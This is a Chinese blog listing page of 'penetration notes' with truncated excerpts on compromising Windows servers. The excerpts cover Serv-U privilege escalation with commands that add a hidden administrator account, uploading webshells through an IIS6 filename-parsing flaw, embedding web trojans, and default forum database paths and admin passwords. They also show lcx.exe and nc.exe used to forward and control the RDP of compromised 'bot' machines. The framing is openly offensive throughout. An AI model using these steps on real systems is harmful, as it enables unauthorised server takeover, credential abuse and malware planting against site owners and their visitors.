渗透笔记
bluerainlife
这个作者很懒,什么都没留下…
展开
-
serv_u提权记录
一.serv-u ftp本地溢出权限提升(使用6.0以及以前版本)0.用Serv-U提权综合工具生成提权工具serv_u.exe1.先上传 serv_u.exe 到一个盘符下 比如是d盘2.执行命令 d:serv_u.exe3.d:serv_u.exe “net user username password /add” (注意命令要有引号)4.d:serv_u.exe“net localgroup administrators username /add” (注意命令要有引号)原创 2010-06-29 15:12:00 · 532 阅读 · 0 评论 -
CMD启动服务命令
cmd下可有两种方法打开服务,net和sc,net用于打开没有被禁用的服务,语法是: net start 服务名,例如:net start TermServicenet stop 服务名,例如:net stop TermService用sc可打开被禁用的服务,语法是:sc config 服务名 start= demand //手动 sc condig 服务名 start= auto原创 2010-05-10 10:25:00 · 3138 阅读 · 0 评论 -
提权十五课(转载)
第一课 提权概述测试环境:Windows xp 系统1 了解什么是提权?通常是 匿名权限(ASP) ASP.NET USER权限入侵获得webshell并不完美,完美的是获得服务器的权限。第一 如果服务器上有装了pcanywhere服务端,管理员为了管理方便 123 123 IP也给了我们方便,到系统盘的Documents and Settings/All Us ers/Application原创 2010-05-10 10:24:00 · 1824 阅读 · 0 评论 -
各种提权总结
需要知道的一些小常识:serv-u自带后门 关键文件 servuadmin.exe或servuadmin.iniserv -u 后门 端口 65500 go od serv-u 6.1open IP 65500一些权限比较大的,但是直接net加个用户没成功 应该考虑到用户策略组的密码14位的限制system32/boot.dat 里面记录3389登录解决终端mstsc /console /v:原创 2010-05-10 10:23:00 · 1461 阅读 · 0 评论 -
serv-u提权命令
C:/Documents and Settings/Administrator>ftp www.xxx.comConnected to www.xxx.com.220 Serv-U FTP Server v6.0 for WinSock ready...User (www.fjkohler.com:(none)): bluerainlife331 User name okay, need pass原创 2010-05-10 10:23:00 · 593 阅读 · 0 评论 -
流行网页木马挂马代码
1、嵌入网页 以下是引用片段: 2、PHP网页挂马 以下是引用片段: 3、图片木马 以下是引用片段: 4、邮件木马 以下是引用片段: 5、flash木马 http://网页木马地址 插入木马地址 width=10 height=10", "GET" 宽度和高度,方式 后面的照添,更改木马地址就可以了。 6、做123.JS文件木马 以下是引用片段: document.wri原创 2010-05-10 10:21:00 · 374 阅读 · 0 评论 -
iis6漏洞利用(x.asp;y.jpg篇)
iis6下的一个解析漏洞1.asp;2.jpg或1.asp;jpg上传1.asp;2.jpg,出现Invalid file.无法上传加gif89a绕过验证,结果也不行。又后想到用一句话木马,保存为1.asp;2.jpg上传。成功上传得到路径/userfiles/image/1_asp;2.jpg发现1.asp又被替换成1_asp了。把1.asp;2.jpg改为1.asp;j原创 2010-05-10 10:21:00 · 1155 阅读 · 0 评论 -
谷歌搜索引擎语法大全
index of mpeg4 3. index of mp3 4. index of rmvb 5. index of rm 7. index of movie 8. index of swf 9. index of jpg 10. index of admin 12. index of pdf 13. index of doc 14. index of wmv 15. index of mdb原创 2010-05-10 10:20:00 · 494 阅读 · 0 评论 -
lcx.exe的用法
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389. 用法:如在本机B上监听 -listen 51 3389,在肉鸡A上运行-slave 本机ip 51 肉鸡ip 3389 那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是本机转向。 首先在自己机子的cm原创 2010-05-10 10:28:00 · 961 阅读 · 0 评论 -
渗透笔记第二节(hack tools)
通过几天的学习,基本掌握了几种常用的检测工具,例如:检测网站注入漏洞的啊D,hdsi,NBSI等工具,这类工具都有一个共同的特点,功能比较全面,除了注入以及数据库表名和字段猜解等功能,还融合了注入后台地址扫描,旁注,几种上传漏洞以及db_owner列目录等功能。漏洞扫描类,我经常用到的例如xscan,流光等等,最近经常使用天镜脆弱性扫描工具。中文界面,漏洞库比较全。其实漏洞扫描类的软件分很原创 2010-05-10 10:18:00 · 460 阅读 · 0 评论 -
网站默认数据库地址,后台和密码
动网:默认数据库/data/dvbbs7.mdb备份数据库/databackup/dvbbs7.mdb前台:用户名:admin密 码:admin888后台:用户名:admin密 码:admin888---------------bbsxp:默认数据库database/bbsxp.mdb_______________LeadBBS默认数据库Data/LeadBBS.mdb用户名: Admin密 码:原创 2010-05-10 10:22:00 · 4771 阅读 · 0 评论 -
渗透站点思路篇
从以上流程图可以看出,网站渗透的步骤其实就这么几种.在渗透过程中可以用到很多技术手段,例如存在注入点后是否可执行SQL语句等等.我想很多网站渗透的新手在使用注入工具的时候都存在一个现象,如果对这个站点字段猜解或后台登陆地址失败时就放弃了,其实不然,我们可以通过搜索引擎来获取某个站点对你有用的东西.例如使用啊D扫描后未发现渗透网站后台,那我们可以试试搜索引擎.www.xxx.com是原创 2010-05-10 10:18:00 · 835 阅读 · 0 评论 -
随笔记录
Windows 2003 的Web服务器存在文件夹解析漏洞,如web目录中存在xx.asp目录,则此目录中所有文件将被解析成 .asp如网站有建立目录和上传图片的权限,拿webshell就很容易了。 利用iis put scaner工具扫描IIS可写漏洞,上传txt格式一句话木马,然后修改后缀为asp得到webshell。原创 2010-05-10 10:17:00 · 229 阅读 · 0 评论 -
nc.exe高级技巧应用汇总
文章结构0. 写在前面的话1. Netcat 1.10 for NT - nc11nt.zip,原始英文信息2. Netcat 1.10 for NT 帮助信息3. Netcat 1.10 常用的命令格式4. 管理肉鸡,更改肉鸡设置5. 下载连接6. 后记 ###################################################################原创 2010-05-10 10:26:00 · 354 阅读 · 0 评论